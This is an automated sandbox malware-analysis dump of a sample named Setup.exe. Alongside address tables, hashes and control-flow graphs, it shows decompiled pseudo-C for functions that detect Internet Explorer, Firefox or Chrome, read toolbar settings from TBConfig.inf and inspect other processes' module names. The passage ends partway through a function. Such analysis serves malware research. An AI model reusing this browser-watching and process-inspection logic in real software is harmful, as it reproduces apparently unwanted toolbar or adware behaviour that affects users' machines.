                                                                                                                                                              0x0049206d
                                                                                                                                                              0x00492082
                                                                                                                                                              0x00492087
                                                                                                                                                              0x00492091
                                                                                                                                                              0x00492096
                                                                                                                                                              0x004920a0
                                                                                                                                                              0x004920a5
                                                                                                                                                              0x004920c6
                                                                                                                                                              0x004920cb
                                                                                                                                                              0x004920e8
                                                                                                                                                              0x004920f4
                                                                                                                                                              0x004920fa
                                                                                                                                                              0x0049210f
                                                                                                                                                              0x00492114
                                                                                                                                                              0x0049211e
                                                                                                                                                              0x00492123
                                                                                                                                                              0x0049212d
                                                                                                                                                              0x00492132
                                                                                                                                                              0x00492153
                                                                                                                                                              0x00492158
                                                                                                                                                              0x00492175
                                                                                                                                                              0x00492181
                                                                                                                                                              0x00492187
                                                                                                                                                              0x0049219c
                                                                                                                                                              0x004921a1
                                                                                                                                                              0x004921ab
                                                                                                                                                              0x004921b0
                                                                                                                                                              0x004921ba
                                                                                                                                                              0x004921bf
                                                                                                                                                              0x004921e0
                                                                                                                                                              0x004921e5
                                                                                                                                                              0x00492202
                                                                                                                                                              0x0049220e
                                                                                                                                                              0x00492214
                                                                                                                                                              0x00492229
                                                                                                                                                              0x0049222e
                                                                                                                                                              0x00492238
                                                                                                                                                              0x0049223d
                                                                                                                                                              0x00492247
                                                                                                                                                              0x0049224c
                                                                                                                                                              0x0049226d
                                                                                                                                                              0x00492272
                                                                                                                                                              0x0049228f
                                                                                                                                                              0x0049229b
                                                                                                                                                              0x004922a1
                                                                                                                                                              0x004922b6
                                                                                                                                                              0x004922bb
                                                                                                                                                              0x004922c5
                                                                                                                                                              0x004922ca
                                                                                                                                                              0x004922d4
                                                                                                                                                              0x004922d9
                                                                                                                                                              0x004922dd
                                                                                                                                                              0x004922f3
                                                                                                                                                              0x004922f8
                                                                                                                                                              0x004922fc
                                                                                                                                                              0x00492300
                                                                                                                                                              0x00492302
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492308
                                                                                                                                                              0x0049230c
                                                                                                                                                              0x00492327
                                                                                                                                                              0x0049230e
                                                                                                                                                              0x00492316
                                                                                                                                                              0x00492316
                                                                                                                                                              0x0049232a
                                                                                                                                                              0x0049232e
                                                                                                                                                              0x00492349
                                                                                                                                                              0x0049234f
                                                                                                                                                              0x00492351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492370
                                                                                                                                                              0x00492375
                                                                                                                                                              0x00492391
                                                                                                                                                              0x00492397
                                                                                                                                                              0x004923a1
                                                                                                                                                              0x004923bc
                                                                                                                                                              0x004923c4
                                                                                                                                                              0x004923c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004923c8
                                                                                                                                                              0x004923cc
                                                                                                                                                              0x004923d4
                                                                                                                                                              0x004923d4
                                                                                                                                                              0x004923e4
                                                                                                                                                              0x004923ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00492330
                                                                                                                                                              0x00492330
                                                                                                                                                              0x004923f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004923f0
                                                                                                                                                              0x0049232e
                                                                                                                                                              0x004923f5
                                                                                                                                                              0x004923fc
                                                                                                                                                              0x00492408
                                                                                                                                                              0x0049240d
                                                                                                                                                              0x0049240f
                                                                                                                                                              0x00492417
                                                                                                                                                              0x0049241c
                                                                                                                                                              0x0049241c
                                                                                                                                                              0x0049240f
                                                                                                                                                              0x00492421
                                                                                                                                                              0x00492427
                                                                                                                                                              0x0049242d
                                                                                                                                                              0x00492434
                                                                                                                                                              0x00492439
                                                                                                                                                              0x00492443
                                                                                                                                                              0x00492448
                                                                                                                                                              0x0049244e
                                                                                                                                                              0x00492451
                                                                                                                                                              0x00492466
                                                                                                                                                              0x00492466
                                                                                                                                                              0x00491fea
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Chrome_WidgetWin_0$Chrome_WidgetWin_1$IEFrame$MozillaUIWindowClass$MozillaWindowClass
                                                                                                                                                              • API String ID: 0-1325454669
                                                                                                                                                              • Opcode ID: 47271f5d255105937451c300bb579388e601e760e0d38bb1269346cfc4cb8fda
                                                                                                                                                              • Instruction ID: 068bcbba74f8fad60f21ca895231b3698f7e5d6b81cf0523b8161fadf405f3c8
                                                                                                                                                              • Opcode Fuzzy Hash: 47271f5d255105937451c300bb579388e601e760e0d38bb1269346cfc4cb8fda
                                                                                                                                                              • Instruction Fuzzy Hash: 98D17BB0904258DBDB25DB64CD95BEEBB78AF14304F1041EEE10967291DB782F88CF99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004908A0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 802 4908a0-4908de GetTickCount 803 4908e0-4908f2 802->803 804 490902-490940 call 434050 call 4175c0 call 434050 call 4175c0 802->804 803->804 805 4908f4-4908fd 803->805 817 49094d-49095d call 4903a0 804->817 818 490942-490948 call 405140 804->818 807 490ab3-490acb call 44f6c8 805->807 821 490962-490967 817->821 818->817 822 490a89-490aad call 4176e0 * 2 821->822 823 49096d-490971 821->823 822->807 824 49097a-4909b3 call 416a30 call 45508b call 452266 823->824 825 490973 823->825 824->822 836 4909b9-4909de call 455a52 call 4522f9 824->836 825->824 841 4909e9-4909ff call 4522f9 836->841 842 4909e0-4909e7 836->842 848 490a0a-490a20 call 4522f9 841->848 849 490a01-490a08 841->849 843 490a29-490a2d 842->843 846 490a2f-490a6f call 434050 call 417910 call 4181d0 call 4176e0 843->846 847 490a71-490a86 843->847 846->822 847->822 848->843 855 490a22 848->855 849->843 855->843
                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E004908A0(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v52;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				char _v608;
				char _v1120;
				char _v1121;
				char _v1122;
				char _v1156;
				char _v1157;
				intOrPtr _v1164;
				signed int _v1168;
				signed int _t61;
				signed int _t62;
				signed char _t70;
				intOrPtr _t73;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				void* _t93;
				void* _t123;
				void* _t124;
				signed int _t125;

				_t124 = __esi;
				_t123 = __edi;
				_t93 = __ebx;
				_push(0xffffffff);
				_push(0x50ab4d);
				_push( *[fs:0x0]);
				_t61 =  *0x561244; // 0xddd124f9
				_t62 = _t61 ^ _t125;
				_v20 = _t62;
				_push(_t62);
				 *[fs:0x0] =  &_v16;
				_v1168 = __ecx;
				_v92 = GetTickCount();
				if(_a4 != 0 || _v92 -  *((intOrPtr*)(_v1168 + 0x20)) >= 0xbb8) {
					_v88 = 0xffffffff;
					E004175C0(E00434050( &_v1121));
					_v8 = 0;
					E004175C0(E00434050( &_v1122));
					_v8 = 1;
					__eflags = _a4;
					if(__eflags != 0) {
						__eflags = _a4 + 4;
						E00405140(_a4 + 4);
					}
					_t70 = E004903A0(_t93, _v1168, _t123, _t124, __eflags,  &_v84,  &_v52, 0); // executed
					_t121 = _t70 & 0x000000ff;
					__eflags = _t70 & 0x000000ff;
					if((_t70 & 0x000000ff) != 0) {
						__eflags = _a4;
						if(_a4 == 0) {
							_v88 = 0;
						}
						E0045508B(E00416A30( &_v80), 0, 0,  &_v608,  &_v1120);
						_t121 =  &_v1120;
						_t78 = E00452266( &_v1120,  &_v1120, L".exe");
						__eflags = _t78;
						if(_t78 == 0) {
							E00455A52( &_v1120, _t123,  &_v608);
							_t81 = E004522F9( &_v608, L"iexplore");
							__eflags = _t81;
							if(_t81 != 0) {
								_t82 = E004522F9( &_v608, L"firefox");
								__eflags = _t82;
								if(_t82 != 0) {
									_t84 = E004522F9( &_v608, L"chrome");
									__eflags = _t84;
									if(_t84 == 0) {
										_v88 = 2;
									}
								} else {
									_v88 = 1;
								}
							} else {
								_v88 = 0;
							}
							__eflags = _a4;
							if(_a4 == 0) {
								 *((intOrPtr*)(_v1168 + 0x24)) = _v88;
								_t121 = _v1168;
								 *((intOrPtr*)(_v1168 + 0x20)) = _v92;
							} else {
								E00417910( &_v608, E00434050( &_v1157));
								_v8 = 2;
								_t121 =  &_v1156;
								E004181D0(_a4,  &_v1156);
								_v8 = 1;
								E004176E0();
							}
						}
					}
					_v1164 = _v88;
					_v8 = 0;
					E004176E0();
					_v8 = 0xffffffff;
					E004176E0();
					_t73 = _v1164;
				} else {
					_t121 = _v1168;
					_t73 =  *((intOrPtr*)(_v1168 + 0x24));
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t73, _t93, _v20 ^ _t125, _t121, _t123, _t124);
			}































                                                                                                                                                              0x004908a0
                                                                                                                                                              0x004908a0
                                                                                                                                                              0x004908a0
                                                                                                                                                              0x004908a3
                                                                                                                                                              0x004908a5
                                                                                                                                                              0x004908b0
                                                                                                                                                              0x004908b7
                                                                                                                                                              0x004908bc
                                                                                                                                                              0x004908be
                                                                                                                                                              0x004908c1
                                                                                                                                                              0x004908c5
                                                                                                                                                              0x004908cb
                                                                                                                                                              0x004908d7
                                                                                                                                                              0x004908de
                                                                                                                                                              0x00490902
                                                                                                                                                              0x00490918
                                                                                                                                                              0x0049091d
                                                                                                                                                              0x00490933
                                                                                                                                                              0x00490938
                                                                                                                                                              0x0049093c
                                                                                                                                                              0x00490940
                                                                                                                                                              0x00490945
                                                                                                                                                              0x00490948
                                                                                                                                                              0x00490948
                                                                                                                                                              0x0049095d
                                                                                                                                                              0x00490962
                                                                                                                                                              0x00490965
                                                                                                                                                              0x00490967
                                                                                                                                                              0x0049096d
                                                                                                                                                              0x00490971
                                                                                                                                                              0x00490973
                                                                                                                                                              0x00490973
                                                                                                                                                              0x00490995
                                                                                                                                                              0x004909a2
                                                                                                                                                              0x004909a9
                                                                                                                                                              0x004909b1
                                                                                                                                                              0x004909b3
                                                                                                                                                              0x004909c0
                                                                                                                                                              0x004909d4
                                                                                                                                                              0x004909dc
                                                                                                                                                              0x004909de
                                                                                                                                                              0x004909f5
                                                                                                                                                              0x004909fd
                                                                                                                                                              0x004909ff
                                                                                                                                                              0x00490a16
                                                                                                                                                              0x00490a1e
                                                                                                                                                              0x00490a20
                                                                                                                                                              0x00490a22
                                                                                                                                                              0x00490a22
                                                                                                                                                              0x00490a01
                                                                                                                                                              0x00490a01
                                                                                                                                                              0x00490a01
                                                                                                                                                              0x004909e0
                                                                                                                                                              0x004909e0
                                                                                                                                                              0x004909e0
                                                                                                                                                              0x00490a29
                                                                                                                                                              0x00490a2d
                                                                                                                                                              0x00490a7a
                                                                                                                                                              0x00490a7d
                                                                                                                                                              0x00490a86
                                                                                                                                                              0x00490a2f
                                                                                                                                                              0x00490a48
                                                                                                                                                              0x00490a4d
                                                                                                                                                              0x00490a51
                                                                                                                                                              0x00490a5b
                                                                                                                                                              0x00490a60
                                                                                                                                                              0x00490a6a
                                                                                                                                                              0x00490a6a
                                                                                                                                                              0x00490a2d
                                                                                                                                                              0x004909b3
                                                                                                                                                              0x00490a8c
                                                                                                                                                              0x00490a92
                                                                                                                                                              0x00490a99
                                                                                                                                                              0x00490a9e
                                                                                                                                                              0x00490aa8
                                                                                                                                                              0x00490aad
                                                                                                                                                              0x004908f4
                                                                                                                                                              0x004908f4
                                                                                                                                                              0x004908fa
                                                                                                                                                              0x004908fa
                                                                                                                                                              0x00490ab6
                                                                                                                                                              0x00490acb

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick__wcsicoll__wcslwr__wsplitpath
                                                                                                                                                              • String ID: .exe$chrome$firefox$iexplore
                                                                                                                                                              • API String ID: 2438297081-2896129864
                                                                                                                                                              • Opcode ID: 109f32217dcdc2aed6e4a36be8767c9548daeb00cefb0319db9fb4e4b38703da
                                                                                                                                                              • Instruction ID: 37f3a4782168a7ba4b219689af37ff2fec423a0874b7ec890f9b0939c7c311b7
                                                                                                                                                              • Opcode Fuzzy Hash: 109f32217dcdc2aed6e4a36be8767c9548daeb00cefb0319db9fb4e4b38703da
                                                                                                                                                              • Instruction Fuzzy Hash: 265173B19102189FDF14DF95CD85BEEBBB4BF14304F1085AEE50667281EB786A48CF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004D22E0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 144COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E004D22E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v150;
				short _v152;
				char _v180;
				void* _v184;
				char _v212;
				char _v216;
				char _v220;
				char _v221;
				char _v252;
				char _v284;
				char _v285;
				intOrPtr _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				signed int _t52;
				signed int _t53;
				long _t65;
				signed char _t66;
				void* _t69;
				void* _t83;
				void* _t116;
				void* _t117;
				signed int _t118;

				_t117 = __esi;
				_t116 = __edi;
				_t83 = __ebx;
				_push(0xffffffff);
				_push(0x50c1e1);
				_push( *[fs:0x0]);
				_t52 =  *0x561244; // 0xddd124f9
				_t53 = _t52 ^ _t118;
				_v20 = _t53;
				_push(_t53);
				 *[fs:0x0] =  &_v16;
				_v220 = 4;
				E004175C0(E00434050( &_v221));
				_v8 = 0;
				if(0x5bdf4c == 0) {
					_v296 = 0;
				} else {
					_v296 = 0x5bdf50;
				}
				_v300 = E004098D0( &_v252, _v296, L"TBConfig.inf");
				_v304 = _v300;
				_v8 = 1;
				E00409810(_v304);
				_v8 = 3;
				E004178C0( &_v252);
				_v152 = 0;
				E00451D90(_t116,  &_v150, 0, 0x7e);
				_t65 = GetPrivateProfileStringW(L"toolbar", L"name", 0x534670,  &_v152, 0x40, E00416A30( &_v180)); // executed
				if(_t65 != 0) {
					E00417910( &_v152, E00434050( &_v285));
					_v8 = 4;
					E004181D0( &_v216,  &_v284);
					_v8 = 3;
					E004176E0();
				}
				_t66 = E00416630( &_v212);
				_t126 = _t66 & 0x000000ff;
				if((_t66 & 0x000000ff) != 0) {
					E004160E0(E004D1B70( &_v212, 0xe),  &_v216, 1);
				}
				if(E00425A20(_t83,  &_v212, _t116, _t117, _t126, 0, 4, L"mntr") != 0) {
					__eflags = E00425A20(_t83,  &_v212, _t116, _t117, __eflags, 0, 4, L"bstl");
					if(__eflags != 0) {
						_t69 = E00425A20(_t83,  &_v212, _t116, _t117, __eflags, 0, 4, L"cndt");
						__eflags = _t69;
						if(_t69 == 0) {
							_v220 = 3;
						}
					} else {
						_v220 = 2;
					}
				} else {
					_v220 = 1;
				}
				if(_a4 != 0) {
					E004181D0(_a4,  &_v216);
				}
				_v292 = _v220;
				_v8 = 0;
				E004176E0();
				_v8 = 0xffffffff;
				E004176E0();
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v292, _t83, _v20 ^ _t118, _v220, _t116, _t117);
			}






























                                                                                                                                                              0x004d22e0
                                                                                                                                                              0x004d22e0
                                                                                                                                                              0x004d22e0
                                                                                                                                                              0x004d22e3
                                                                                                                                                              0x004d22e5
                                                                                                                                                              0x004d22f0
                                                                                                                                                              0x004d22f7
                                                                                                                                                              0x004d22fc
                                                                                                                                                              0x004d22fe
                                                                                                                                                              0x004d2301
                                                                                                                                                              0x004d2305
                                                                                                                                                              0x004d230b
                                                                                                                                                              0x004d2327
                                                                                                                                                              0x004d232c
                                                                                                                                                              0x004d233a
                                                                                                                                                              0x004d234c
                                                                                                                                                              0x004d233c
                                                                                                                                                              0x004d2344
                                                                                                                                                              0x004d2344
                                                                                                                                                              0x004d2371
                                                                                                                                                              0x004d237d
                                                                                                                                                              0x004d2383
                                                                                                                                                              0x004d2394
                                                                                                                                                              0x004d2399
                                                                                                                                                              0x004d23a3
                                                                                                                                                              0x004d23aa
                                                                                                                                                              0x004d23bc
                                                                                                                                                              0x004d23e8
                                                                                                                                                              0x004d23f0
                                                                                                                                                              0x004d240b
                                                                                                                                                              0x004d2410
                                                                                                                                                              0x004d2421
                                                                                                                                                              0x004d2426
                                                                                                                                                              0x004d2430
                                                                                                                                                              0x004d2430
                                                                                                                                                              0x004d243b
                                                                                                                                                              0x004d2443
                                                                                                                                                              0x004d2445
                                                                                                                                                              0x004d245c
                                                                                                                                                              0x004d245c
                                                                                                                                                              0x004d2477
                                                                                                                                                              0x004d2499
                                                                                                                                                              0x004d249b
                                                                                                                                                              0x004d24b8
                                                                                                                                                              0x004d24bd
                                                                                                                                                              0x004d24bf
                                                                                                                                                              0x004d24c1
                                                                                                                                                              0x004d24c1
                                                                                                                                                              0x004d249d
                                                                                                                                                              0x004d249d
                                                                                                                                                              0x004d249d
                                                                                                                                                              0x004d2479
                                                                                                                                                              0x004d2479
                                                                                                                                                              0x004d2479
                                                                                                                                                              0x004d24cf
                                                                                                                                                              0x004d24db
                                                                                                                                                              0x004d24db
                                                                                                                                                              0x004d24e6
                                                                                                                                                              0x004d24ec
                                                                                                                                                              0x004d24f6
                                                                                                                                                              0x004d24fb
                                                                                                                                                              0x004d2508
                                                                                                                                                              0x004d2516
                                                                                                                                                              0x004d252b

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString_memset
                                                                                                                                                              • String ID: TBConfig.inf$bstl$cndt$mntr$name$toolbar
                                                                                                                                                              • API String ID: 52020338-616969326
                                                                                                                                                              • Opcode ID: 160960445c8143f5cb87fbff7eca0841f38b85c355043c3659fd8628d174bc84
                                                                                                                                                              • Instruction ID: 179ce378cb9408fc47fb286d9aad18257402b0420dcce1f1aa30694a285b3d12
                                                                                                                                                              • Opcode Fuzzy Hash: 160960445c8143f5cb87fbff7eca0841f38b85c355043c3659fd8628d174bc84
                                                                                                                                                              • Instruction Fuzzy Hash: 4C513170A002189ADB24DF65DD52BEEB774AF54304F0041DBE609B62C1EF786B88CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00496160 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E00496160(void* __ebx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8) {
				int _v8;
				char _v16;
				void* _v20;
				signed int _v24;
				char _v542;
				char _v544;
				int _v548;
				int _v552;
				char _v584;
				char _v585;
				char _v620;
				char _v621;
				signed int _t39;
				signed int _t40;
				short _t42;
				void* _t50;
				void* _t52;
				void* _t62;
				void* _t86;
				signed int _t87;

				_t86 = __esi;
				_t85 = __edi;
				_t62 = __ebx;
				_push(0xffffffff);
				_push(0x5085e8);
				_push( *[fs:0x0]);
				_t39 =  *0x561244; // 0xddd124f9
				_t40 = _t39 ^ _t87;
				_v24 = _t40;
				_push(_t40);
				 *[fs:0x0] =  &_v16;
				_t42 =  *0x52a818; // 0x0
				_v544 = _t42;
				E00451D90(__edi,  &_v542, 0, 0x206);
				E00417910(L"N/A", E00434050( &_v585));
				_v8 = 0;
				_t82 =  &_v584;
				E004181D0(_a8,  &_v584);
				_v8 = 0xffffffff;
				E004176E0();
				_v20 = OpenProcess(0x410, 0, _a4);
				if(_v20 == 0) {
					_t50 = 0;
				} else {
					_v548 = 0;
					_v552 = 0;
					_push( &_v552);
					_push(4);
					_push( &_v548);
					_t52 = _v20;
					_push(_t52); // executed
					L0046BBE6(); // executed
					if(_t52 == 0) {
						_push(0x104);
						_push( &_v544);
						_t82 = _v20;
						_push(_v20);
						L0046BBEC();
						if(_t52 != 0) {
							goto L5;
						} else {
							CloseHandle(_v20);
							_t50 = 0;
						}
					} else {
						_push(0x104);
						_push( &_v544);
						_push(_v548);
						_push(_v20); // executed
						L0046BBE0(); // executed
						L5:
						E00417910( &_v544, E00434050( &_v621));
						_v8 = 1;
						_t82 =  &_v620;
						E004181D0(_a8,  &_v620);
						_v8 = 0xffffffff;
						E004176E0();
						FindCloseChangeNotification(_v20); // executed
						_t50 = E0042E0C0(_a8 + 4);
					}
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t50, _t62, _v24 ^ _t87, _t82, _t85, _t86);
			}























                                                                                                                                                              0x00496160
                                                                                                                                                              0x00496160
                                                                                                                                                              0x00496160
                                                                                                                                                              0x00496163
                                                                                                                                                              0x00496165
                                                                                                                                                              0x00496170
                                                                                                                                                              0x00496177
                                                                                                                                                              0x0049617c
                                                                                                                                                              0x0049617e
                                                                                                                                                              0x00496181
                                                                                                                                                              0x00496185
                                                                                                                                                              0x0049618b
                                                                                                                                                              0x00496191
                                                                                                                                                              0x004961a6
                                                                                                                                                              0x004961c5
                                                                                                                                                              0x004961ca
                                                                                                                                                              0x004961d1
                                                                                                                                                              0x004961db
                                                                                                                                                              0x004961e0
                                                                                                                                                              0x004961ed
                                                                                                                                                              0x00496203
                                                                                                                                                              0x0049620a
                                                                                                                                                              0x004962ce
                                                                                                                                                              0x00496210
                                                                                                                                                              0x00496210
                                                                                                                                                              0x0049621a
                                                                                                                                                              0x0049622a
                                                                                                                                                              0x0049622b
                                                                                                                                                              0x00496233
                                                                                                                                                              0x00496234
                                                                                                                                                              0x00496237
                                                                                                                                                              0x00496238
                                                                                                                                                              0x0049623f
                                                                                                                                                              0x0049625f
                                                                                                                                                              0x0049626a
                                                                                                                                                              0x0049626b
                                                                                                                                                              0x0049626e
                                                                                                                                                              0x0049626f
                                                                                                                                                              0x00496276
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00496278
                                                                                                                                                              0x0049627c
                                                                                                                                                              0x00496282
                                                                                                                                                              0x00496282
                                                                                                                                                              0x00496241
                                                                                                                                                              0x00496241
                                                                                                                                                              0x0049624c
                                                                                                                                                              0x00496253
                                                                                                                                                              0x00496257
                                                                                                                                                              0x00496258
                                                                                                                                                              0x00496286
                                                                                                                                                              0x0049629f
                                                                                                                                                              0x004962a4
                                                                                                                                                              0x004962ab
                                                                                                                                                              0x004962b5
                                                                                                                                                              0x004962ba
                                                                                                                                                              0x004962c7
                                                                                                                                                              0x004962d6
                                                                                                                                                              0x004962e2
                                                                                                                                                              0x004962e2
                                                                                                                                                              0x0049623f
                                                                                                                                                              0x004962ea
                                                                                                                                                              0x004962ff

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004961A6
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,004E02FB,?,N/A,00000000,?,?,DDD124F9), ref: 004961FD
                                                                                                                                                              • EnumProcessModules.PSAPI(00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 00496238
                                                                                                                                                              • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 00496258
                                                                                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 0049626F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 0049627C
                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,00000000,?,00000104,00000000,00000000,00000004,00000000,?,?,DDD124F9), ref: 004962D6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseFileName$ChangeEnumFindHandleImageModuleModulesNotificationOpen_memset
                                                                                                                                                              • String ID: N/A
                                                                                                                                                              • API String ID: 2394274632-2525114547
                                                                                                                                                              • Opcode ID: b5c1a42de278e672675ba6a7fc7533878be40c9162315e7e6c9ca31d811e26e5
                                                                                                                                                              • Instruction ID: 42d94aa43d634cfac3a89f673f245cccc0f2457812a480bc51963134419dc0f8
                                                                                                                                                              • Opcode Fuzzy Hash: b5c1a42de278e672675ba6a7fc7533878be40c9162315e7e6c9ca31d811e26e5
                                                                                                                                                              • Instruction Fuzzy Hash: 5B41BF71900218ABDB14EFA0DC49FEEB374FF18300F0046AEB519A7190EB786A48CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0048CC50 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 107COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E0048CC50(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				char _v24;
				char _v28;
				signed int _v32;
				char _v94;
				char _v96;
				char _v124;
				char _v128;
				char _v129;
				signed int _v136;
				signed int _t30;
				signed int _t31;
				void* _t36;
				signed int _t47;
				signed char _t54;
				signed int _t78;

